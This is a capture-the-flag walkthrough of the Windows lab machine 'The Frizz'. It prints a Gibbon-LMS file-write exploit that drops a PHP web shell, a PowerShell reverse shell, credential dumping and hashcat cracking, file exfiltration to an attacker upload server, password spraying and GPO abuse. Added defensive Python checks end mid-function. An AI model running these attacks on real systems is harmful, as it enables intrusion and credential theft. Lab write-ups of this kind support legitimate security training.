30 August 2025

The Frizz

by 0xW1LD


Information Gathering

Enumeration

Let’s start off with an nmap scan:

PORT      STATE SERVICE       REASON          VERSION
22/tcp    open  ssh           syn-ack ttl 127 OpenSSH for_Windows_9.5 (protocol 2.0)
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
|_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-16 03:49:02Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
51001/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51010/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
51037/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-03-16T03:50:00
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 36038/tcp): CLEAN (Timeout)
|   Check 2 (port 51039/tcp): CLEAN (Timeout)
|   Check 3 (port 35435/udp): CLEAN (Timeout)
|   Check 4 (port 50651/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: 6h59m58s

HTTP

Attempting to open the Apache web page redirects us to frizzdc.frizz.htb; after adding this host to our hosts file, the site loads.

On clicking Staff Login we get redirected to a Gibbon-LMS login page.

Foothold

Looking around, we find that this Gibbon-LMS version has an Arbitrary File Write vulnerability. We can abuse it with the following command:

curl 'http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php' -d 'img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b&path=asdf.php&gibbonPersonID=0000000001'

asdf.php

Visiting http://frizzdc.frizz.htb/Gibbon-LMS/asdf.php?cmd=whoami gets us a response of:

frizz\w.webservice frizz\w.webservice
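
The request above works because the img field is a data URI whose header is never checked against the bytes, and the path field is written to disk as given. As an added example (not code from the writeup or from Gibbon-LMS), the block below shows how that img parameter decodes and what a hardened handler would do differently: allowlist the MIME type, check the decoded bytes against that type's magic, and derive the saved name from a sanitised stem plus an extension chosen by the verified type. unsafe_upload is a hypothetical reconstruction of the exploited behaviour, check_upload and decide are constructed for this illustration, EXPLOIT_BODY is the body from the curl command above, and BENIGN_BODY is a constructed valid request.

```python
import base64
import binascii
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs, quote

# Image types the endpoint should accept: the extension each gets on disk and
# the leading "magic" bytes a genuine file of that type starts with.
ALLOWED_IMAGES = {
    "image/png": (".png", b"\x89PNG\r\n\x1a\n"),
    "image/jpeg": (".jpg", b"\xff\xd8\xff"),
    "image/gif": (".gif", b"GIF8"),
}
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")


def parse_img(img: str) -> tuple[str, bytes]:
    """Split the 'mime;anything,base64' shape sent in the img field.
    Returns (mime, decoded bytes); raises ValueError/binascii.Error if malformed."""
    head, sep, data = img.partition(",")
    if not sep:
        raise ValueError("no ',' between header and data")
    mime = head.split(";", 1)[0].strip().lower()
    return mime, base64.b64decode(data, validate=True)


def unsafe_upload(img: str, path: str) -> tuple[str, bytes]:
    """Hypothetical reconstruction of the behaviour the writeup exploits (not
    Gibbon-LMS's code): the header is ignored and the decoded bytes are stored
    under whatever file name the client supplied, .php included."""
    _, data = parse_img(img)
    return path, data


def check_upload(img: str, path: str) -> tuple[bool, str]:
    """Hardened decision for one request: (True, safe_file_name) or (False, reason)."""
    try:
        mime, data = parse_img(img)
    except (ValueError, binascii.Error) as exc:
        return False, f"malformed img parameter: {exc}"
    if mime not in ALLOWED_IMAGES:
        return False, f"MIME type not allowed: {mime}"
    ext, magic = ALLOWED_IMAGES[mime]
    # The declared type must match the bytes: a script claiming image/png stops here.
    if not data.startswith(magic):
        return False, f"content does not look like {mime}"
    # The client-controlled path is reduced to a bare stem; the extension comes
    # from the verified MIME type, so traversal and .php names never reach disk.
    stem = PurePosixPath(path.replace("\\", "/")).stem
    if not SAFE_STEM.fullmatch(stem):
        return False, f"unsafe file name: {path!r}"
    return True, stem + ext


def decide(body: str) -> tuple[bool, str]:
    """Parse a URL-encoded POST body (as curl -d sends it) and run check_upload."""
    form = parse_qs(body, keep_blank_values=True)
    return check_upload(form.get("img", [""])[0], form.get("path", [""])[0])


# Request body from the writeup's curl command (%2b is the URL-encoded '+').
EXPLOIT_BODY = ("img=image/png;asdf,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbJ2NtZCddKT8%2b"
                "&path=asdf.php&gibbonPersonID=0000000001")
# Constructed benign request: a minimal PNG signature plus padding, base64-encoded.
PNG_B64 = base64.b64encode(b"\x89PNG\r\n\x1a\n" + bytes(8)).decode()
BENIGN_BODY = (f"img=image/png;base64,{quote(PNG_B64, safe='')}"
               "&path=rubric1.png&gibbonPersonID=0000000001")

if __name__ == "__main__":
    print("exploit body:", decide(EXPLOIT_BODY))   # rejected: bytes are not a PNG
    print("benign body: ", decide(BENIGN_BODY))    # accepted as rubric1.png
```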

We successfully have RCE! Let’s modify this to get a reverse shell:

  1. Create a PHP payload using the encoded reverse shell:

echo '<?php echo system("powershell -e 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")?>' | base64 -w 0; echo

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

  2. Start a listener:

nc -lvnp 4444
Ncat: Version 7.95 ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444

  3. Upload the reverse shell using the Arbitrary File Write:

curl 'http://frizzdc.frizz.htb/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php' -d 'img=image/png;asdf,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%2b&path=w1ld.php&gibbonPersonID=0000000001' && curl 'http://frizzdc.frizz.htb/Gibbon-LMS/w1ld.php' -I

We get a call-back on our listener:

Ncat: Connection from 10.129.225.39:49759.
whoami
frizz\w.webservice

Looking around we find database credentials:

PS C:\xampp\htdocs\Gibbon-LMS> cat config.php

<SNIP>
$databaseServer = 'localhost';
$databaseUsername = 'MrGibbonsDB';
$databasePassword = 'MisterGibbs!Parrot!?1';
$databaseName = 'gibbon';
<SNIP>

XAMPP usually has MySQL installed in C:\xampp\mysql\bin:

PS C:\xampp\mysql\bin> ls mysql.exe


    Directory: C:\xampp\mysql\bin


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        10/30/2023   5:58 AM        3784616 mysql.exe  

We can enumerate the database using the binary in this folder.

PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 -D gibbon -e "show databases;"                                                           
Database
gibbon
information_schema
test

Let’s look for the tables.

PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 -D gibbon -e "use gibbon; show tables;"
<SNIP>
gibbonpayment                        
gibbonpermission            
gibbonperson       
gibbonpersonaldocument  
gibbonpersonaldocumenttype
gibbonpersonmedical    
<SNIP>

In the output we find gibbonperson; let’s take a look.

PS C:\xampp\mysql\bin> .\mysql.exe -u MrGibbonsDB -pMisterGibbs!Parrot!?1 -D gibbon -e "USE gibbon; select * FROM gibbonperson;"  
gibbonPersonID  title   surname firstName       preferredName   officialName    nameInCharacters        gender  username        passwordStrong  passwordStrongSalt      passwordForceReset    status   canLogin        gibbonRoleIDPrimary     gibbonRoleIDAll dob     email   emailAlternate  image_240       lastIPAddress   lastTimestamp   lastFailIPAddress       lastFailTimestamp     failCount        address1        address1District        address1Country address2        address2District        address2Country phone1Type      phone1CountryCode       phone1  phone3Type    phone3CountryCode        phone3  phone2Type      phone2CountryCode       phone2  phone4Type      phone4CountryCode       phone4  website languageFirst   languageSecond  languageThird   countryOfBirth birthCertificateScan    ethnicity       religion        profession      employer        jobTitle        emergency1Name  emergency1Number1       emergency1Number2       emergency1Relationship emergency2Name  emergency2Number1       emergency2Number2       emergency2Relationship  gibbonHouseID   studentID       dateStart       dateEnd gibbonSchoolYearIDClassOf       lastSchool     nextSchool      departureReason transport       transportNotes  calendarFeedPersonal    viewCalendarSchool      viewCalendarPersonal    viewCalendarSpaceBooking        gibbonApplicationFormID        lockerNumber    vehicleRegistration     personalBackground      messengerLastRead       privacy dayType gibbonThemeIDPersonal   gibboni18nIDPersonal    studentAgreements     googleAPIRefreshToken    microsoftAPIRefreshToken        genericAPIRefreshToken  receiveNotificationEmails       mfaSecret       mfaToken        cookieConsent   fields
0000000001      Ms.     Frizzle Fiona   Fiona   Fiona Frizzle           Unspecified     f.frizzle       067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03        /aACFhikmNopqrRTVz2489 N       Full    Y       001     001     NULL    f.frizzle@frizz.htb     NULL    NULL    ::1     2024-10-29 09:28:59     NULL    NULL    0                                             NULL             NULL    NULL    NULL                                                    Y       Y       N       NULL                            NULL    NULL    NULL    NULL    NULL    NULL  YNULL    NULL    NULL

We find a hashed password and password salt!

Let’s put the hash and salt into a text file in hashcat’s hash:salt format:

echo "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03:/aACFhikmNopqrRTVz2489" > hash.txt

And crack it using hashcat:

hashcat -m 1420 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 5800H with Radeon Graphics, 2913/5890 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

We crack the hash and get the following credentials:

f.frizzle:Jenni_Luvs_Magic23
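
Mode 1420 was the right choice because Gibbon stores passwordStrong as sha256(passwordStrongSalt . password), a single unsalted-iteration hash that an offline attacker can test at GPU speed. As an added example (not from the writeup or Gibbon-LMS), the block below reproduces that scheme, builds the hash:salt line used above, verifies the cracked credential against the row we dumped, and shows the fix a defender would ship: verify against the legacy record once and re-hash with PBKDF2-HMAC-SHA256 on successful login. The pbkdf2_sha256$ record format and the 600,000 iteration count are choices made here, not Gibbon's.

```python
import hashlib
import hmac
import os
from typing import Optional

# Gibbon-LMS: passwordStrong = sha256(passwordStrongSalt . password) as hex.
# This is exactly hashcat mode 1420 (sha256($salt.$pass)): one SHA-256 per
# guess and no work factor, so rockyou-scale wordlists finish in seconds.
PBKDF2_ITERATIONS = 600_000  # OWASP (2023) recommendation for PBKDF2-HMAC-SHA256


def gibbon_hash(salt: str, password: str) -> str:
    return hashlib.sha256((salt + password).encode("utf-8")).hexdigest()


def to_hashcat_line(stored_hash: str, salt: str) -> str:
    """The hash:salt line the writeup writes to hash.txt for hashcat -m 1420."""
    return f"{stored_hash}:{salt}"


def verify_gibbon(password: str, stored_hash: str, salt: str) -> bool:
    return hmac.compare_digest(gibbon_hash(salt, password), stored_hash.lower())


def pbkdf2_hash(password: str, salt: Optional[bytes] = None) -> str:
    """Replacement scheme (our choice, not Gibbon's): PBKDF2-HMAC-SHA256 with a
    random per-user salt, stored as pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_pbkdf2(password: str, stored: str) -> bool:
    scheme, iterations, salt_hex, digest_hex = stored.split("$")
    if scheme != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def login_and_upgrade(password: str, stored_hash: str, salt: str) -> Optional[str]:
    """Check the password against whichever record format is stored and return
    the record to keep: the existing PBKDF2 record, a fresh PBKDF2 record when a
    legacy sha256(salt.password) record verified, or None if the password is wrong.
    Migrating on login is the realistic fix when only legacy hashes exist."""
    if stored_hash.startswith("pbkdf2_sha256$"):
        return stored_hash if verify_pbkdf2(password, stored_hash) else None
    if not verify_gibbon(password, stored_hash, salt):
        return None
    return pbkdf2_hash(password)


# Values from the gibbonperson row dumped above and the hashcat result.
F_FRIZZLE_HASH = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03"
F_FRIZZLE_SALT = "/aACFhikmNopqrRTVz2489"

if __name__ == "__main__":
    print(to_hashcat_line(F_FRIZZLE_HASH, F_FRIZZLE_SALT))
    print("legacy verify:", verify_gibbon("Jenni_Luvs_Magic23", F_FRIZZLE_HASH, F_FRIZZLE_SALT))
    print("upgraded record:", login_and_upgrade("Jenni_Luvs_Magic23", F_FRIZZLE_HASH, F_FRIZZLE_SALT))
```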

User

Let’s grab users using LDAP with Kerberos authentication:

sudo ntpdate frizzdc.frizz.htb && nxc ldap frizzdc.frizz.htb -u "f.frizzle" -p "Jenni_Luvs_Magic23" -k --users
[sudo] password for kali: 
2025-03-16 17:10:56.162014 (+1100) +0.766024 +/- 0.299041 frizzdc.frizz.htb 10.129.225.39 s1 no-leap
CLOCK: time stepped by 0.766024
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [*]  x64 (name:frizzdc.frizz.htb) (domain:frizz.htb) (signing:True) (SMBv1:False)
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [+] frizz.htb\f.frizzle:Jenni_Luvs_Magic23 
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb [*] Enumerated 21 domain users: frizz.htb
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb -Username-                    -Last PW Set-       -BadPW- -Description-                                               
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Administrator                 2025-02-25 21:24:10 0       Built-in account for administering the computer/domain      
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb Guest                         <never>             0       Built-in account for guest access to the computer/domain    
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb krbtgt                        2024-10-29 14:19:54 0       Key Distribution Center Service Account                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb f.frizzle                     2024-10-29 14:27:03 0       Wizard in Training                                          
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb w.li                          2024-10-29 14:27:03 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb h.arm                         2024-10-29 14:27:03 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb M.SchoolBus                   2024-10-29 14:27:03 0       Desktop Administrator                                       
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb d.hudson                      2024-10-29 14:27:03 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb k.franklin                    2024-10-29 14:27:03 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb l.awesome                     2024-10-29 14:27:03 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb t.wright                      2024-10-29 14:27:03 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb r.tennelli                    2024-10-29 14:27:04 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb J.perlstein                   2024-10-29 14:27:04 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb a.perlstein                   2024-10-29 14:27:04 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb p.terese                      2024-10-29 14:27:04 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb v.frizzle                     2024-10-29 14:27:04 0       The Wizard                                                  
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb g.frizzle                     2024-10-29 14:27:04 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb c.sandiego                    2024-10-29 14:27:04 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb c.ramon                       2024-10-29 14:27:04 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb m.ramon                       2024-10-29 14:27:04 0       Student                                                     
LDAP        frizzdc.frizz.htb 389    frizzdc.frizz.htb w.Webservice                  2024-10-29 14:27:04 0       Service for the website 

Let’s grab a Kerberos ticket using impacket-getTGT:

impacket-getTGT frizz.htb/f.frizzle:Jenni_Luvs_Magic23                     
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
[*] Saving ticket in f.frizzle.ccache

Then let’s add the Kerberos realm:

echo "[libdefaults]
        dns_lookup_realm = true
        dns_lookup_kdc = true

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB
" | sudo tee /etc/krb5.conf

[libdefaults]
    default_realm = FRIZZ.HTB
    dns_lookup_kdc = true
    rdns = false

[realms]
    FRIZZ.HTB = {
        kdc = frizzdc.frizz.htb
        admin_server = frizzdc.frizz.htb
    }

[domain_realm]
    .frizz.htb = FRIZZ.HTB
    frizz.htb = FRIZZ.HTB

Now let’s use SSH to connect to the DC with Kerberos:

KRB5CCNAME=f.frizzle.ccache ssh f.frizzle@frizzdc.frizz.htb

PowerShell 7.4.5
PS C:\Users\f.frizzle> 

Privilege Escalation

First off, let’s log in to http://frizzdc.frizz.htb/Gibbon-LMS using f.frizzle’s credentials.

We have quite a few messages, so let’s check them. Looking through them, we notice that certain files have been DELETED.

Let’s take a look at the Recycle Bin:

PS C:\Users\f.frizzle> ls -hidden 'C:\$RECYCLE.BIN'

    Directory: C:\$RECYCLE.BIN

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d--hs          10/29/2024  7:31 AM                S-1-5-21-2386970044-1145388522-2932701813-1103

Looking in this folder we find a couple of zip archives:

PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> ls

    Directory: C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a---          10/29/2024  7:31 AM            148 $IE2XMEG.7z
-a---          10/24/2024  9:16 PM       30416987 $RE2XMEG.7z

Let’s use an upload server to pull these files back to our machine.

First, let’s grab PSUpload.ps1:

wget https://raw.githubusercontent.com/juliourena/plaintext/refs/heads/master/Powershell/PSUpload.ps1

--2025-03-18 21:52:16--  https://raw.githubusercontent.com/juliourena/plaintext/refs/heads/master/Powershell/PSUpload.ps1
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1752 (1.7K) [text/plain]
Saving to: ‘PSUpload.ps1’

PSUpload.ps1                                    100%[======================================================================================================>]   1.71K  --.-KB/s    in 0s      

2025-03-18 21:52:17 (7.48 MB/s) - ‘PSUpload.ps1’ saved [1752/1752]

Let’s run the script by copy-pasting it into our shell on the target:

PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103>
function Invoke-FileUpload {
        Param (
                [Parameter(Position = 0, Mandatory = $True)]
                [String]$File,

                [Parameter(Position = 1, Mandatory = $True)]
                [String]$Uri
                )

        $FileToUpload = Get-ChildItem -File "$File"

        $UTF8woBOM = New-Object "System.Text.UTF8Encoding" -ArgumentList @($false)
        $boundary = '----BCA246E0-E2CF-48ED-AACE-58B35D68B513'
        $tempFile = New-TemporaryFile
        Remove-Item $tempFile -Force -ErrorAction Ignore
        $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
        $fileName = [System.IO.Path]::GetFileName($FileToUpload.FullName)
        $sw.Write("--$boundary`r`nContent-Disposition: form-data;name=`"files`";filename=`"$fileName`"`r`n`r`n")
        $sw.Close()
        $fs = New-Object System.IO.FileStream($tempFile, [System.IO.FileMode]::Append)
        $bw = New-Object System.IO.BinaryWriter($fs)
        $fileBinary = [System.IO.File]::ReadAllBytes($FileToUpload.FullName)
        $bw.Write($fileBinary)
        $bw.Close()
        $sw = New-Object System.IO.StreamWriter($tempFile, $true, $UTF8woBOM)
        $sw.Write("`r`n--$boundary--`r`n")
        $sw.Close()

        Invoke-RestMethod -Method POST -Uri $uri -ContentType "multipart/form-data; boundary=$boundary" -InFile $tempFile

        $FileHash = Get-FileHash -Path "$File" -Algorithm MD5
        Write-Host "[+] File Uploaded: " $FileToUpload.FullName
        Write-Host "[+] FileHash: " $FileHash.Hash
}

Then install the Python uploadserver package on our machine:

pip install uploadserver --break-system-packages
Defaulting to user installation because normal site-packages is not writeable
Requirement already satisfied: uploadserver in /home/kali/.local/lib/python3.13/site-packages (6.0.0)

Next let’s start our upload server:

python3 -m uploadserver                         
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Lastly let’s upload our file:

PS C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103> Invoke-FileUpload -File '$RE2XMEG.7z' -Uri 'http://10.10.14.6:8000/upload'

[+] File Uploaded:  C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z
[+] FileHash:  41925935E2002D33F7203F5F76F5D5BE

We have successfully exfiltrated a file from the $RECYCLE.BIN! Let’s extract it:

7za x '$RE2XMEG.7z'

7-Zip (a) 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29
 64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM

Scanning the drive for archives:
1 file, 30416987 bytes (30 MiB)

Extracting archive: $RE2XMEG.7z
--
Path = $RE2XMEG.7z
Type = 7z
Physical Size = 30416987
Headers Size = 65880
Method = ARM64 LZMA2:26 LZMA:20 BCJ2
Solid = +
Blocks = 3

Everything is Ok                                                                 

Folders: 684
Files: 5384
Size:       141187501
Compressed: 30416987

Let’s cd into the directory that was just made:

cd wapt

And let’s look for passwords:

grep -r 'password'

<SNIP>
conf/waptserver.ini:wapt_password = IXN1QmNpZ0BNZWhUZWQhUgo=
<SNIP>

We found what looks to be a base64-encoded password! Let’s decode it:

echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d                
!suBcig@MehTed!R

Let’s do a simple password spray using the users we have extracted earlier:

nxc smb frizzdc.frizz.htb -u users.txt  -p '!suBcig@MehTed!R' -k                  
SMB         frizzdc.frizz.htb 445    frizzdc          [*]  x64 (name:frizzdc) (domain:frizz.htb) (signing:True) (SMBv1:False)
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\Administrator:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED 
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\Guest:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\krbtgt:!suBcig@MehTed!R KDC_ERR_CLIENT_REVOKED
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\f.frizzle:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\w.li:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB         frizzdc.frizz.htb 445    frizzdc          [-] frizz.htb\h.arm:!suBcig@MehTed!R KDC_ERR_PREAUTH_FAILED
SMB         frizzdc.frizz.htb 445    frizzdc          [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R

Success! We found the following credentials:

M.SchoolBus: !suBcig@MehTed!R

Let’s grab a TGT really quickly:

impacket-getTGT 'frizz.htb/M.SchoolBus:!suBcig@MehTed!R'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in M.SchoolBus.ccache 

We can log in as M.SchoolBus!

KRB5CCNAME=M.SchoolBus.ccache ssh -K M.SchoolBus@frizzdc.frizz.htb
PowerShell 7.4.5
PS C:\Users\M.SchoolBus>

Let’s collect some BloodHound data:

nxc ldap frizzdc.frizz.htb -u M.SchoolBus -p '!suBcig@MehTed!R' --bloodhound -c all

Looking at the data we can see that M.SchoolBus can write GP-Links.

Additionally, we can see that he’s a member of Desktop Admins, through which he’s a transitive member of Group Policy Creator Owners.

So let’s download a copy of SharpGPOAbuse.exe.

Next let’s transfer this exe file over:

  1. Start a Python file server:

    sudo python3 -m http.server 80
    Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

  2. Download the binary:

    PS C:\Users\M.SchoolBus> curl.exe http://10.10.14.6/SharpGPOAbuse.exe -O
      % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
    100 80896  100 80896    0     0  63487      0  0:00:01  0:00:01 --:--:-- 63447


Next let’s create a new GPO and link it to the domain root:

PS C:\Users\M.SchoolBus> New-GPO -Name pwned -Comment "pwned!" | New-GPLink -Target "DC=FRIZZ,DC=HTB" -LinkEnabled Yes 

GpoId       : 3517e6eb-b63e-4f98-8cd2-cca7cf29e45e
DisplayName : pwned
Enabled     : True
Enforced    : False
Target      : DC=frizz,DC=htb
Order       : 2

Next let’s use that GPO to make f.frizzle a local admin:

PS C:\Users\M.SchoolBus> ./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount f.frizzle --GPOName "pwned"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of f.frizzle = S-1-5-21-2386970044-1145388522-2932701813-1103
[+] GUID of "pwned" is: {FF20811C-EA41-4334-ACCD-D5165CB24F62}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{FF20811C-EA41-4334-ACCD-D5165CB24F62}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
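
From the defender’s side, the artefact this leaves behind is the GptTmpl.inf written into SYSVOL above: a Restricted Groups entry under [Group Membership] that pushes a SID into BUILTIN\Administrators (S-1-5-32-544). The following added example (not code from the writeup or from SharpGPOAbuse) parses such a file and reports any Administrators member that is not on an allowlist, so the change can be caught on SYSVOL review rather than after the next gpupdate. The sample INF text is constructed here using the f.frizzle SID from the output above; the allowlist containing the domain’s RID 512 (Domain Admins) is an assumption about what a legitimate policy would contain.

```python
import re
from pathlib import Path
from typing import Dict, List, Set

BUILTIN_ADMINISTRATORS = "S-1-5-32-544"
# Restricted Groups keys look like "*<group SID>__Members" and "*<group SID>__Memberof".
MEMBERS_KEY = re.compile(r"^\*(?P<group>S-1-5-[0-9-]+)__Members$", re.IGNORECASE)

# Constructed GptTmpl.inf modelled on a Restricted Groups policy that adds one
# domain account to the local Administrators group; the member SID is the one
# SharpGPOAbuse printed for f.frizzle above.
SAMPLE_GPTTMPL = """[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
*S-1-5-32-544__Memberof =
*S-1-5-32-544__Members = *S-1-5-21-2386970044-1145388522-2932701813-1103
"""


def decode_inf(raw: bytes) -> str:
    """GptTmpl.inf is normally UTF-16 LE with a BOM; fall back to UTF-8."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def parse_inf(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INF parser: {section: {key: value}}; ';' comment lines skipped."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def restricted_group_members(inf_text: str) -> Dict[str, List[str]]:
    """Map each restricted group SID to the member SIDs the policy enforces."""
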